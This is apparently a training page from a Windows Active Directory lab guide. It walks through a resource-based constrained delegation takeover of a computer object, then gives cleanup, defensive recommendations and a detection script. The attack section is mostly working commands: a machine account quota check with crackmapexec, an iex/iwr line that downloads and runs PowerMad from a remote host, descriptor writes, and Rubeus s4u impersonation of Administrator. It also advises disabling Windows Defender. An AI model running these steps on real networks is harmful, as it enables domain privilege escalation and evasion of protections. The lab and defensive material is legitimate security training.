Building a Windows AD lab

Computeraccount Takeover

If you have GenericAll or GenericWrite rights to a computer object you can write to the attribute msds-AllowedToActOnBehalfOfOtherIdentity and then abuse the delegation to take over the system.


Configuring

Prerequisite

Configuring

Nothing needs to be configured to abuse this, since we set the GenericAll permissions during the "Owns" section. If you would like to configure it, it can be configured the same way as we configured "Write Owner".

Attacking

How it works

If you have GenericAll or GenericWrite rights to a computer object you can write to the attribute msds-AllowedToActOnBehalfOfOtherIdentity. If you control this attribute you can impersonate and authenticate as any domain user to the computer, which gives you access to the computer as long as you can impersonate a user that has access to it. Users with the flag "This account is sensitive and cannot be delegated" or members of the "Protected Users" group can't be impersonated.

Tools

Executing the attack

Prerequisite

  • An account with an SPN associated (or the ability to add new machine accounts; the default value of this quota is 10)

  • A user with write privileges over the target computer, which doesn't yet have msds-AllowedToActOnBehalfOfOtherIdentity set

Executing the attack

  1. It is expected that the GenericAll permissions during the ACL abuses "Write Owner" and "Owns" are set for the sa_sql user. This attack will continue from there:

2. First we will check that the target doesn't have the msds-AllowedToActOnBehalfOfOtherIdentity attribute set.

Get-DomainComputer -Domain secure.local -Credential $creds -Server 10.0.0.100 Data01 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

The attribute hasn't been set yet.

3. Add the following to the /etc/hosts file on Kali otherwise the Crackmapexec command will fail:

10.0.0.100 secure.local
10.0.0.100 dc03
10.0.0.100 dc03.secure.local

4. Check if we can add computers to the domain, since it's a requirement for the attack. We can get the machine account quota from the domain with Crackmapexec:

crackmapexec ldap 10.0.0.100 -u sa_sql -p Iloveyou2 -M MAQ

The machine account quota is 10, meaning we (all authenticated users) can create our own computer object in the domain.

5. Create a machine account with the name FAKE01 and password 123456 with PowerMad:

iex (iwr http://192.168.248.2:8090/Powermad.ps1 -usebasicparsing)
New-MachineAccount -Domain secure.local -Credential $creds -DomainController 10.0.0.100 -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

6. Get the SID of the computer object we created:

Get-DomainComputer fake01 -Domain secure.local -Credential $creds -Server 10.0.0.100

7. Now we need to create the raw security descriptor which we then will write to the attribute:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1498997062-1091976085-892328878-1108)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Make sure you changed the SID since it can differ in your lab.

8. Now we can write, as sa_sql, to the msds-allowedtoactonbehalfofotheridentity attribute of the computer object DATA01:

Get-DomainComputer DATA01 -Domain secure.local -Credential $creds -Server 10.0.0.100 | Set-DomainObject -Domain secure.local -Credential $creds -Server 10.0.0.100 -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

9. Seems like it worked. Now we can check the value of the msds-AllowedToActOnBehalfOfOtherIdentity attribute by saving it in a variable and doing some PowerShell kung fu to decode it:

$RawBytes = Get-DomainComputer DATA01 -Domain secure.local -Credential $creds -Server 10.0.0.100 -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select-Object -ExpandProperty msds-allowedtoactonbehalfofotheridentity
(New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0).DiscretionaryAcl
Get-DomainComputer -Domain secure.local -Credential $creds -Server 10.0.0.100 <SID>

10. FAKE01 can now impersonate any user to DATA01. To do this we first need to calculate the NTLM hash of the FAKE01 password, which we can do with Rubeus.

.\Rubeus.exe hash /password:123456 /user:fake01 /domain:secure.local

Temporarily disable Windows Defender if it gets flagged by it.

11. The next step is to run Rubeus to impersonate the Administrator user using the FAKE01 computer account, abusing Resource Based Constrained Delegation. We will request a CIFS ticket so we can list the C disk.

.\Rubeus.exe s4u /domain:secure.local /dc:10.0.0.100 /user:fake01 /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:CIFS/data01.secure.local /ptt

12. We got a CIFS ticket as Administrator for data01.secure.local, now we can try to list the C disk.

Cleanup

  1. Log in to DC03 as Administrator with the password Welcome01!.

  2. Execute the following command to remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute from DATA01.

Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null -Identity data01

3. Execute the following command to remove the FAKE01 computer we created:

Get-ADComputer fake01 | Remove-ADObject

Defending

Recommendations

  • Change who can add computers to the domain.

  • Add privileged users to the protected users group.

  • Add the flag "Account is sensitive and cannot be delegated".

Detection
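
As an added audit example (not part of the original page), the PowerShell below does for the whole domain what step 9 above does by hand for DATA01: it lists every computer object whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated and decodes the DACL to the principals that may act on its behalf, and it lists computer accounts that were joined through the MachineAccountQuota (AD records the creator in mS-DS-CreatorSID only when the creator was not an administrator, which is how FAKE01 from step 5 shows up). It assumes the RSAT ActiveDirectory module on a domain-joined host; the server address is this lab's DC03.

```powershell
# Added audit script, not from the original page. Requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory
$Server = '10.0.0.100'   # DC03 in this lab (assumption); point it at your own DC

# Turn a security descriptor into the principals it grants access to. The AD module
# returns msDS-AllowedToActOnBehalfOfOtherIdentity as an ActiveDirectorySecurity object;
# raw LDAP tools such as PowerView (step 9) return the descriptor as a byte[].
function Get-RbcdPrincipals {
    param($Descriptor)
    $bytes = if ($Descriptor -is [byte[]]) { $Descriptor }
             else { $Descriptor.GetSecurityDescriptorBinaryForm() }
    $sd = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $bytes, 0
    foreach ($ace in $sd.DiscretionaryAcl) {
        $sid  = $ace.SecurityIdentifier
        $name = try { $sid.Translate([Security.Principal.NTAccount]).Value } catch { '<unresolved>' }
        [pscustomobject]@{ Principal = $name; SID = $sid.Value; AccessMask = $ace.AccessMask }
    }
}

# 1. Computers that allow some principal to act on behalf of other identities (RBCD).
#    After the cleanup section of this page the list should be empty.
Write-Host '== Computers with msDS-AllowedToActOnBehalfOfOtherIdentity set =='
Get-ADComputer -Server $Server -Filter 'msDS-AllowedToActOnBehalfOfOtherIdentity -like "*"' `
    -Properties msDS-AllowedToActOnBehalfOfOtherIdentity |
    ForEach-Object {
        $computer = $_
        Get-RbcdPrincipals $computer.'msDS-AllowedToActOnBehalfOfOtherIdentity' |
            Select-Object @{n='Computer';e={$computer.Name}}, Principal, SID, AccessMask
    } | Format-Table -AutoSize

# 2. Computer accounts created by non-administrators through the MachineAccountQuota.
#    mS-DS-CreatorSID is only populated for such joins, so every hit deserves a look.
Write-Host '== Computers created via MachineAccountQuota (mS-DS-CreatorSID set) =='
Get-ADComputer -Server $Server -Filter 'mS-DS-CreatorSID -like "*"' `
    -Properties mS-DS-CreatorSID, whenCreated |
    Select-Object Name, whenCreated, @{n='CreatedBy';e={
        $creator = New-Object Security.Principal.SecurityIdentifier($_.'mS-DS-CreatorSID', 0)
        try { $creator.Translate([Security.Principal.NTAccount]).Value } catch { $creator.Value }
    }} | Format-Table -AutoSize
```

Run it before and after an exercise: a DATA01 row naming FAKE01, and a FAKE01 row created by sa_sql, are exactly the traces the cleanup steps are meant to remove.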

References

Owns
PowerMad
Invoke-DNSUpdate
Change who can join computers to the domain
Protected users group
Account is sensitive and cannot be delegated
GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit tools
Powermad/Invoke-DNSUpdate.ps1 at master · Kevin-Robertson/Powermad